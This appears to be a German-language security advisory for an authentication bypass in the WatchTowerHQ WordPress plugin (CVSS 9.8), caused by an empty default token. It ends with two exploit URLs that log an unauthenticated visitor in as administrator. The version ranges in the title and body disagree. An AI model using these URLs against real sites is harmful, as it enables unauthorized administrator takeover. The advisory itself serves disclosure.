
WatchTowerHQ <= 3.10.1 - Authentifizierungsumgehung zum Administrator aufgrund fehlender Prüfung auf leere Werte
WatchTowerHQ <= 3.10.1 - Authentifizierungsumgehung zum Administrator aufgrund fehlender Prüfung auf leeren Wert
Das WatchTowerHQ-Plugin für WordPress ist in Versionen bis einschließlich 3.9.6 anfällig für eine Authentifizierungsumgehung. Dies liegt daran, dass der Standardwert von 'watchtower_ota_token' leer ist und die Prüfung auf einen nicht leeren Wert in der Funktion 'Password_Less_Access::login' fehlt. Dadurch ist es nicht authentifizierten Angreifern möglich, sich als WatchTowerHQ-Client-Administratorbenutzer anzumelden.
State: PUBLISHED
Score: 9.8
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
http://kubernetes.docker.internal/?wht_login=1
OR
http://kubernetes.docker.internal/?wht_login=1&access_token=not_set
Wenn das System anfällig ist, werden Sie als Administrator angemeldet.